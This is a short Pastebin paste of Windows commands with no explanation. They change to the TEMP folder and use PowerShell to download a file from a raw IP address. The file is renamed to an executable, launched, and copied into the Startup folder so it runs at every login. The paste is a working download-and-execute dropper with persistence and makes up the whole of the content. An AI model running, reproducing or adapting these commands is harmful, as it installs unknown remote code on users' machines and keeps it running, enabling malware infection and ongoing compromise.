Advertisement
Guest User

Untitled

a guest
Oct 14th, 2019
124
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. cd c:\
  2. cmd
  3. cd %TEMP%
  4. cmd /c powershell -Command "(New-Object Net.WebClient).DownloadFile('http://157.245.120.60/test.bin', 'test.bin')"
  5. rename test.bin test.exe
  6. start test.exe
  7. copy test.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\test.exe"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement